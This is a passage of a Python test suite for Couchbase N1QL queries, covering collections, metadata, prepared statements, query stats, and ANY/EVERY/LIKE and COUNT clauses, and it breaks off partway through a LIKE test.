source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
tuq_sanity.py
|
import datetime
import json
import math
import random
import re
import time
import threading
from datetime import date
from deepdiff import DeepDiff
from membase.api.exception import CBQError
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteMachineShellConnection
from collection.collections_n1ql_client import CollectionsN1QL
from .tuq import QueryTests
class QuerySanityTests(QueryTests):
def setUp(self):
super(QuerySanityTests, self).setUp()
self.log.info("============== QuerySanityTests setup has started ==============")
self.index_to_be_created = self.input.param("index_to_be_created", '')
self.query_to_be_run = self.input.param("query_to_be_run", '')
if self.load_sample:
self.rest.load_sample("travel-sample")
self.wait_for_all_indexes_online()
self.log.info("============== QuerySanityTests setup has completed ==============")
self.log_config_info()
self.query_buckets = self.get_query_buckets(check_all_buckets=True)
self.collection_names = []
self.creation_failure = []
self.deletion_failure = []
def suite_setUp(self):
super(QuerySanityTests, self).suite_setUp()
self.log.info("============== QuerySanityTests suite_setup has started ==============")
if self.input.param("fast_count", False):
random_number = 23917
shell = RemoteMachineShellConnection(self.master)
shell.execute_cbworkloadgen(self.rest.username, self.rest.password, random_number, 100,
self.default_bucket_name, 1024, '-j')
self.run_cbq_query(
query="INSERT INTO " + self.query_buckets[0] +
" ( key, value) VALUES ('pymc100205',{'name':'Sara','age':'30'})")
self.log.info("============== QuerySanityTests suite_setup has completed ==============")
def tearDown(self):
self.log.info("============== QuerySanityTests tearDown has started ==============")
self.log.info("============== QuerySanityTests tearDown has completed ==============")
super(QuerySanityTests, self).tearDown()
def suite_tearDown(self):
self.log.info("============== QuerySanityTests suite_tearDown has started ==============")
self.log.info("============== QuerySanityTests suite_tearDown has completed ==============")
super(QuerySanityTests, self).suite_tearDown()
##############################################################################################
#
# SIMPLE CHECKS
##############################################################################################
def test_error_message_collections_full(self):
try:
self.run_cbq_query(query="SELECT * FROM default:default.test.tes")
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e), "The full path was not inside the error message! {0}".format(str(e)))
try:
self.run_cbq_query(query="SELECT * FROM default.test.tes")
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e), "The full path was not inside the error message! {0}".format(str(e)))
def test_error_message_collections_query_context(self):
try:
self.run_cbq_query(query="SELECT * FROM tes", query_context=self.query_context)
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e),
"The full path was not inside the error message! {0}".format(str(e)))
def test_error_namespace(self):
try:
results = self.run_cbq_query(query='select * from default.test.tes where name = "new hotel"', query_context='default:')
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e), "The full path was not inside the error message! {0}".format(str(e)))
def test_stats_collections(self):
curl_output = self.shell.execute_command(
"curl http://{0}:{1}/admin/stats".format(self.master.ip, self.n1ql_port))
curl = json.loads(curl_output[0][0])
starting_deletes = curl['deletes.count']
starting_selects = curl['selects.count']
starting_inserts = curl['inserts.count']
try:
self.run_cbq_query(query="CREATE PRIMARY INDEX ON default:default.{0}.{1}".format(self.scope, self.collections[0]))
self.run_cbq_query(query="SELECT * FROM default:default.test.test1 b WHERE b.name = 'new hotel'")
self.run_cbq_query(query="SELECT * FROM test1 b WHERE b.name = 'new hotel'",
query_context='default:default.test')
self.run_cbq_query(
query=('INSERT INTO default:default.{0}.{1}'.format(self.scope, self.collections[
0]) + '(KEY, VALUE) VALUES ("key6", { "type" : "hotel", "name" : "new hotel" })'))
self.run_cbq_query(
query='DELETE FROM default:default.test.test1 LIMIT 1')
curl_output = self.shell.execute_command(
"curl http://{0}:{1}/admin/stats".format(self.master.ip, self.n1ql_port))
curl = json.loads(curl_output[0][0])
self.assertEqual(curl['deletes.count'], starting_deletes + 1)
self.assertEqual(curl['selects.count'], starting_selects + 2)
self.assertEqual(curl['inserts.count'], starting_inserts + 1)
except Exception as e:
self.log.error("One of the queries failed or the stats were wrong: {0}".format(str(e)))
self.fail()
def test_stats_collections_prepareds(self):
try:
self.run_cbq_query(query="PREPARE p1 AS SELECT * FROM default:default.test.test1 b WHERE b.name = 'new hotel'")
self.run_cbq_query(query="PREPARE p2 AS SELECT * FROM test1 b WHERE b.name = 'new hotel'", query_context='default:default.test')
self.run_cbq_query(query="execute p2", query_context='default:default.test')
self.run_cbq_query(query="execute p1", query_context='default:default.test')
curl_output = self.shell.execute_command("curl http://{0}:{1}/admin/stats".format(self.master.ip, self.n1ql_port))
curl = json.loads(curl_output[0][0])
self.assertEqual(curl['prepared.count'], 2)
finally:
self.run_cbq_query(query="DELETE from system:prepareds")
def test_escaped_identifiers(self):
self.fail_if_no_buckets()
queries_errors = {'SELECT name FROM {0} as bucket': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s as `bucket` ORDER BY name' % query_bucket
actual_result = self.run_cbq_query()
expected_list = [{"name": doc["name"]} for doc in self.full_list]
expected_list_sorted = sorted(expected_list, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_list_sorted)
def test_prepared_encoded_rest(self):
result_count = 1412
if not self.sample_bucket:
self.sample_bucket = 'beer-sample'
self.rest.load_sample(self.sample_bucket)
self.wait_for_buckets_status({self.sample_bucket: "healthy"}, 5, 120)
self.wait_for_bucket_docs({self.sample_bucket: 7303}, 5, 120)
self._wait_for_index_online('beer-sample', 'beer_primary')
query_bucket = self.get_collection_name(self.sample_bucket)
try:
query = 'create index myidx on {0}(name,country,code) where (type="brewery")'.format(query_bucket)
self.run_cbq_query(query)
self._wait_for_index_online('beer-sample', 'myidx')
query = 'prepare s1 from SELECT name, IFMISSINGORNULL(country,999), IFMISSINGORNULL(code,999)' \
' FROM {0} WHERE type = "brewery" AND name IS NOT MISSING'.format(query_bucket)
result = self.run_cbq_query(query)
encoded_plan = '"' + result['results'][0]['encoded_plan'] + '"'
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
time.sleep(20)
server = None
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.start_server()
self.wait_for_buckets_status({self.sample_bucket: "healthy"}, 5, 120)
self.wait_for_bucket_docs({self.sample_bucket: 7303}, 5, 120)
self._wait_for_index_online('beer-sample', 'beer_primary')
cmd = "%s http://%s:%s/query/service -u %s:%s -H 'Content-Type: application/json' " \
"-d '{ \"prepared\": \"s1\", \"encoded_plan\": %s }'" % (
self.curl_path, server.ip, self.n1ql_port, self.username, self.password, encoded_plan)
for server in self.servers:
remote = RemoteMachineShellConnection(server)
result = remote.execute_command(cmd)
new_list = [string.strip() for string in result[0]]
concat_string = ''.join(new_list)
json_output = json.loads(concat_string)
self.log.info(json_output['metrics']['resultCount'])
self.assertEqual(json_output['metrics']['resultCount'], result_count)
finally:
self.rest.delete_bucket(self.sample_bucket)
self.wait_for_bucket_delete(self.sample_bucket, 5, 120)
# These bugs are not planned to be fixed therefore this test isnt in any confs
'''MB-19887 and MB-24303: These queries were returning incorrect results with views.'''
def test_views(self):
self.fail_if_no_buckets()
created_indexes = []
try:
idx = "ix1"
self.query = "CREATE INDEX %s ON " % idx + self.query_buckets[0] + " (x,y) USING VIEW"
self.run_cbq_query()
created_indexes.append(idx)
time.sleep(15)
self.run_cbq_query("insert into " + self.query_buckets[0] + " values ('k01',{'x':10})")
result = self.run_cbq_query("select x,y from " + self.query_buckets[0] + " where x > 3")
self.assertTrue(result['results'][0] == {"x": 10})
self.run_cbq_query('insert into ' + self.query_buckets[0] + ' values("k02", {"x": 20, "y": 20})')
self.run_cbq_query('insert into ' + self.query_buckets[0] + ' values("k03", {"x": 30, "z": 30})')
self.run_cbq_query('insert into ' + self.query_buckets[0] + ' values("k04", {"x": 40, "y": 40, "z": 40})')
idx2 = "iv1"
self.query = "CREATE INDEX %s ON " % idx2 + self.query_buckets[0] + " (x,y,z) USING VIEW"
self.run_cbq_query()
created_indexes.append(idx2)
expected_result = [{'x': 10}, {'x': 20, 'y': 20}, {'x': 30, 'z': 30}, {'x': 40, 'y': 40, 'z': 40}]
result = self.run_cbq_query('select x,y,z from ' + self.query_buckets[0] + ' use index (iv1 using view) '
'where x is not missing')
self.assertTrue(result['results'] == expected_result)
finally:
for idx in created_indexes:
self.query = "DROP INDEX %s ON %s USING VIEW" % (self.query_buckets[0], idx)
self.run_cbq_query()
def test_collections_meta_keyspace(self):
results = self.run_cbq_query(query='select meta(d) from default:default.test.test1 as d')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
def test_collections_meta_query_context(self):
results = self.run_cbq_query(query='select meta(d) from test1 as d', query_context='default:default.test')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
def test_collections_meta_keyspace_full(self):
results = self.run_cbq_query(query='select meta(default.test.test1) from default:default.test.test1')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
results = self.run_cbq_query(query='select meta(default:default.test.test1) from default:default.test.test1')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
def test_collections_meta_id(self):
results = self.run_cbq_query(query='select meta(d).id from default:default.test.test1 as d')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
results = self.run_cbq_query(query='select meta(d).id from test1 as d', query_context='default:default.test')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
def test_collections_meta_id_full_path(self):
results = self.run_cbq_query(query='select meta(default.test.test1).id from default:default.test.test1')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
results = self.run_cbq_query(query='select meta(default:default.test.test1).id from default:default.test.test1')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
def test_collections_meta_cas(self):
results = self.run_cbq_query(query='select meta(d).cas from default:default.test.test1 as d')
self.assertEqual(results['metrics']['resultCount'], 4)
results = self.run_cbq_query(query='select meta(d).cas from test1 as d', query_context='default:default.test')
self.assertEqual(results['metrics']['resultCount'], 4)
def test_collections_meta_cas_full(self):
results = self.run_cbq_query(query='select meta(default.test.test1).cas from default:default.test.test1')
self.assertEqual(results['metrics']['resultCount'], 4)
results = self.run_cbq_query(query='select meta(default:default.test.test1).cas from default:default.test.test1')
self.assertEqual(results['metrics']['resultCount'], 4)
def test_collections_meta_expiration(self):
results = self.run_cbq_query(query='select meta(d).expiration from default:default.test.test1 as d')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
results = self.run_cbq_query(query='select meta(d).expiration from test1 as d', query_context='default:default.test')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
def test_collections_meta_expiration_full(self):
results = self.run_cbq_query(query='select meta(default.test.test1).expiration from default:default.test.test1')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
results = self.run_cbq_query(query='select meta(default:default.test.test1).expiration from default:default.test.test1')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
''' This test will concurrently create and drop collections, and then give them 5 seconds to appear in system:keyspaces, if any one collection creation/deletion fails the whole test fails '''
def test_create_drop_collections(self):
self.collections_helper = CollectionsN1QL(self.master)
self.collections_helper.create_scope(bucket_name="default", scope_name="scope1")
self.collections_helper.create_scope(bucket_name="default", scope_name="scope2")
for i in range(0, 100):
thread_name = threading.Thread(name='run_collection', target=self.run_create_collection,args=("scope1", "collection1" + str(i)))
thread2_name = threading.Thread(name='run_collection', target=self.run_create_collection,args=("scope2", "collection2" + str(i)))
thread_name.start()
thread2_name.start()
self.sleep(1)
if len(self.creation_failure) > 0:
for collection in self.creation_failure:
self.log.error("Creation failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to create! Check logs for more details")
if len(self.collection_names) > 0:
for collection in self.collection_names:
delete_thread = threading.Thread(name='drop_collection', target=self.run_drop_collection,
args=(collection[0], collection[1]))
delete_thread.start()
delete_thread.join()
if len(self.deletion_failure) > 0:
for collection in self.deletion_failure:
self.log.error("Deletion failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to drop! Check logs for more details")
retry_count = 100
while retry_count > 0:
if len(self.collection_names) > 0:
for collection in self.collection_names:
delete_thread = threading.Thread(name='drop_collection', target=self.run_drop_collection,
args=(collection[0], collection[1]))
delete_thread.start()
if len(self.deletion_failure) > 0:
for collection in self.deletion_failure:
self.log.error("Deletion failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to drop! Check logs for more details")
self.sleep(.5)
retry_count -= 1
if len(self.creation_failure) > 0:
for collection in self.creation_failure:
self.log.error("Creation failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to create! Check logs for more details")
if len(self.deletion_failure) > 0:
for collection in self.deletion_failure:
self.log.error("Deletion failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to drop! Check logs for more details")
'''Create a collection and verify that within 5 seconds it is apart of system:keyspaces, print any errors that occur'''
def run_create_collection(self, scope_name='',collection_name=''):
retry_count = 5
created = self.collections_helper.create_collection(bucket_name="default", scope_name=scope_name, collection_name=collection_name)
while retry_count > 0:
try:
results = self.run_cbq_query('select * from system:keyspaces where name = "{0}"'.format(collection_name))
if results['metrics']['resultCount'] == 1:
break
except Exception as e:
self.log.info(str(e))
continue
self.sleep(1)
retry_count -= 1
if not retry_count > 0:
if collection_name not in self.creation_failure:
self.creation_failure.append((scope_name, collection_name, "Entry not found in system:keyspaces"))
if collection_name not in self.creation_failure:
self.collection_names.append((scope_name, collection_name))
return
'''Drop a collection and verify that within 5 seconds it is removed from system:keyspaces'''
def run_drop_collection(self, scope_name='', collection_name=''):
retry_count = 5
deleted = self.collections_helper.delete_collection(bucket_name="default", scope_name=scope_name, collection_name=collection_name)
while retry_count > 0:
try:
results = self.run_cbq_query('select * from system:keyspaces where name = "{0}"'.format(collection_name))
if results['metrics']['resultCount'] == 0:
break
except Exception as e:
if 'Keyspace not found in CB datastore' in str(e):
break
continue
self.sleep(1)
retry_count -= 1
if not retry_count > 0:
if collection_name not in self.deletion_failure:
self.deletion_failure.append((scope_name, collection_name, "Entry not deleted from system:keyspaces"))
self.collection_names.remove((scope_name, collection_name))
return
##############################################################################################
#
# ALL
##############################################################################################
def test_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT ALL job_title FROM %s ORDER BY job_title' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [{"job_title": doc['job_title']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_all_nested(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT ALL tasks_points.task1 FROM %s ' % query_bucket + \
'ORDER BY tasks_points.task1'
actual_result = self.run_cbq_query()
expected_result = [{"task1": doc['tasks_points']['task1']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['task1']))
self._verify_results(actual_result['results'], expected_result)
self.query = 'SELECT ALL skills[0] as skill' + \
' FROM %s ORDER BY skills[0]' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [{"skill": doc['skills'][0]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['skill']))
self._verify_results(actual_result['results'], expected_result)
if not self.analytics:
self.query = 'SELECT ALL tasks_points.* FROM %s' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [doc['tasks_points'] for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['task1'], doc['task2']))
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['task1'], doc['task2']))
self._verify_results(actual_result, expected_result)
# This method is not used anywhere
def set_indexer_pokemon_settings(self):
projector_json = {"projector.dcp.numConnections": 1}
moi_json = {"indexer.moi.useMemMgmt": True}
server = self.get_nodes_from_services_map(service_type="index")
rest = RestConnection(server)
rest.set_index_settings(projector_json)
self.log.info("{0} set".format(projector_json))
self.sleep(60)
servers = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
for server in servers:
remote = RemoteMachineShellConnection(server)
remote.terminate_process(process_name="projector")
self.sleep(60)
self.sleep(60)
# self.set_indexer_logLevel()
self.loglevel = "info"
self.log.info("Setting indexer log level to {0}".format(self.loglevel))
server = self.get_nodes_from_services_map(service_type="index")
rest = RestConnection(server)
rest.set_indexer_params("logLevel", self.loglevel)
self.sleep(30)
rest.set_index_settings(moi_json)
self.log.info("{0} set".format(moi_json))
self.sleep(30)
def test_all_negative(self):
queries_errors = {'SELECT ALL * FROM %s': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_keywords(self):
queries_errors = {'SELECT description as DESC FROM %s order by DESC': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_distinct_negative(self):
queries_errors = {'SELECT name FROM {0} ORDER BY DISTINCT name': ('syntax error', 3000),
'SELECT name FROM {0} GROUP BY DISTINCT name': ('syntax error', 3000),
'SELECT ANY tasks_points FROM {0}': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_any(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM {0} d WHERE (ANY skill IN d.skills SATISFIES skill = 'skill2010' " \
"END) AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 END) AND NOT (job_title = 'Sales') ORDER BY" \
" name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] == 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
# This test isnt used anywhere
def test_any_within(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s " % query_bucket + \
" d WHERE ANY vm within d.VMs SATISFIES vm.RAM = 5 END"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm["RAM"] == 5]) > 0]
self._verify_results(actual_result['results'], expected_result)
def test_any_no_in_clause(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' end)" + \
"AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] == 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_prepared_any_no_in_clause(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, email FROM %s as d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' end) AND" \
" (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " \
"AND NOT (job_title = 'Sales') ORDER BY name"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
def test_any_external(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s WHERE ' % query_bucket + \
'ANY x IN ["Support", "Management"] SATISFIES job_title = x END ' + \
'ORDER BY name'
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc["job_title"] in ["Support", "Management"]]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_every(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES CEIL(vm.memory) > 5 END) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if math.ceil(vm['memory']) > 5]) == len(doc["VMs"])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_satisfy_negative(self):
queries_errors = {'SELECT name FROM %s WHERE ANY x IN 123 SATISFIES job_title = x END': ('syntax error', 3000),
'SELECT name FROM %s WHERE ANY x IN ["Sales"] SATISFIES job_title = x': (
'syntax error', 3000),
'SELECT job_title FROM %s WHERE ANY job_title IN ["Sales"] SATISFIES job_title = job_title '
'END': (
'syntax error', 3000),
'SELECT job_title FROM %s WHERE EVERY ANY x IN ["Sales"] SATISFIES x = job_title END': (
'syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_check_is_isnot_negative(self):
queries_errors = {'SELECT * FROM %s WHERE name is foo': ('syntax error', 3000),
'SELECT * FROM %s WHERE name is not foo': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_array(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT ARRAY vm.memory FOR vm IN VMs END AS vm_memories" + \
" FROM %s WHERE VMs IS NOT NULL " % query_bucket
if self.analytics:
self.query = 'SELECT (SELECT VALUE vm.memory FROM VMs AS vm) AS vm_memories FROM %s WHERE VMs IS NOT ' \
'NULL ' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['vm_memories']))
expected_result = [{"vm_memories": [vm["memory"] for vm in doc['VMs']]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['vm_memories']))
self._verify_results(actual_result, expected_result)
# This test is not used anywhere
def test_array_objects(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT VMs[*].os from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"os": [vm["os"] for vm in doc['VMs']]}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_arrays_negative(self):
queries_errors = {'SELECT ARRAY vm.memory FOR vm IN 123 END AS vm_memories FROM %s': ('syntax error', 3000),
'SELECT job_title, array_agg(name)[:5] as names FROM %s': ('syntax error', 3000),
'SELECT job_title, array_agg(name)[-20:-5] as names FROM %s': ('syntax error', 3000),
'SELECT job_title, array_agg(name)[a:-b] as names FROM %s': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
# This test is not used anywhere
def test_slicing(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_agg(name)[0:5] as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
for item in actual_result['results']:
self.log.info("Result: %s" % actual_result['results'])
self.assertTrue(len(item['names']) <= 5, "Slicing doesn't work")
self.query = "SELECT job_title, array_agg(name)[5:] as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_item = None
for item in actual_result['results']:
for tmp_item in expected_list:
if item['job_title'] == tmp_item['job_title']:
expected_item = tmp_item
self.log.info("Result: %s" % actual_result['results'])
self.assertTrue(len(item['names']) == len(expected_item['names']),
"Slicing doesn't work")
self.query = "SELECT job_title, array_agg(name)[5:10] as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
for item in actual_result['results']:
self.log.info("Result: %s" % actual_result['results'])
self.assertTrue(len(item['names']) <= 5, "Slicing doesn't work")
def test_count_prepare(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "create index idx_cover on %s(join_mo,join_day) where join_mo > 7" % query_bucket
self.run_cbq_query()
self.query = "SELECT count(*) AS cnt from %s " % query_bucket + \
"WHERE join_mo > 7 and join_day > 1"
self.prepared_common_body()
def test_leak_goroutine(self):
shell = RemoteMachineShellConnection(self.master)
for i in range(20):
cmd = 'curl http://%s:6060/debug/pprof/goroutine?debug=2 | grep NewLexer' % self.master.ip
o = shell.execute_command(cmd)
new_curl = json.dumps(o)
string_curl = json.loads(new_curl)
self.assertTrue("curl: (7) couldn't connect to host" == str(string_curl[1][1]))
cmd = "curl http://%s:8093/query/service -d 'statement=select * from 1+2+3'" % self.master.ip
o = shell.execute_command(cmd)
new_curl = json.dumps(o)
string_curl = json.loads(new_curl)
self.assertTrue(len(string_curl) == 2)
cmd = 'curl http://%s:6060/debug/pprof/goroutine?debug=2 | grep NewLexer' % self.master.ip
o = shell.execute_command(cmd)
new_curl = json.dumps(o)
string_curl = json.loads(new_curl)
self.assertTrue(len(string_curl) == 2)
##############################################################################################
#
# COUNT
##############################################################################################
def test_fast_count(self):
if self.index_to_be_created:
if "EQUALS" in self.index_to_be_created:
self.index_to_be_created = self.index_to_be_created.replace("EQUALS", "=")
self.run_cbq_query(query=self.index_to_be_created)
self.wait_for_all_indexes_online()
try:
if "STAR" in self.query_to_be_run:
self.query_to_be_run = self.query_to_be_run.replace("STAR", "*")
if "EQUALS" in self.query_to_be_run:
self.query_to_be_run = self.query_to_be_run.replace("EQUALS", "=")
# add use primary index hint to the query to compare the GSI query to the primary index query
actual_results = self.run_cbq_query(query=self.query_to_be_run)
split_query = self.query_to_be_run.split("where")
primary_index_query = split_query[0] + "USE INDEX(`#primary`) where" + split_query[1]
expected_results = self.run_cbq_query(query=primary_index_query)
self.assertEqual(actual_results['results'][0]['$1'], expected_results['results'][0]['$1'])
finally:
if self.load_sample:
query_bucket = self.get_collection_name('`travel-sample`')
self.run_cbq_query(query="DROP INDEX idx_flight_stops ON {0}".format(query_bucket))
else:
query_bucket = self.get_collection_name(self.default_bucket_name)
self.run_cbq_query(query="DROP INDEX idx1 ON {0}".format(query_bucket))
def test_primary_count(self):
# number of documents inserted at the beginning of suite_setup
random_number = 23918
RemoteMachineShellConnection(self.master)
if "STAR" in self.query_to_be_run:
self.query_to_be_run = self.query_to_be_run.replace("STAR", "*")
actual_results = self.run_cbq_query(query=self.query_to_be_run)
self.assertEqual(actual_results['results'][0]['$1'], random_number + self.docs_per_day * 2016)
##############################################################################################
#
# LIKE
##############################################################################################
def test_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM {0} WHERE job_title LIKE 'S%' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if doc["job_title"].startswith('S')]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE job_title LIKE '%u%' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if doc["job_title"].find('u') != -1]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE job_title NOT LIKE 'S%' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if not doc["job_title"].startswith('S')]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE job_title NOT LIKE '_ales' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if not (doc["job_title"].endswith('ales') and
len(doc["job_title"]) == 5)]
self.query = "SELECT name FROM {0} WHERE reverse(job_title) NOT LIKE 'sela_' " \
"ORDER BY name".format(query_bucket)
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result1['results'], actual_result['results'])
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_like_negative(self):
queries_errors = {"SELECT tasks_points FROM {0} WHERE tasks_points.* LIKE '_1%'": ('syntax error', 3000)}
self.negative_common_body(queries_errors)
queries_errors = {"SELECT tasks_points FROM {0} WHERE REVERSE(tasks_points.*) LIKE '%1_'": ('syntax error',
3000)}
self.negative_common_body(queries_errors)
def test_like_any(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE (ANY vm IN d.VMs" % query_bucket + \
" SATISFIES vm.os LIKE '%bun%'" + \
"END) AND (ANY skill IN d.skills " + \
"SATISFIES skill = 'skill2010' END) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm["os"].find('bun') != -1]) > 0 and
len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_like_every(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE (EVERY vm IN d.VMs " % query_bucket + \
"SATISFIES vm.os NOT LIKE '%cent%' END)" + \
" AND (ANY skill IN d.skills SATISFIES skill =" + \
" 'skill2010' END) ORDER BY name"
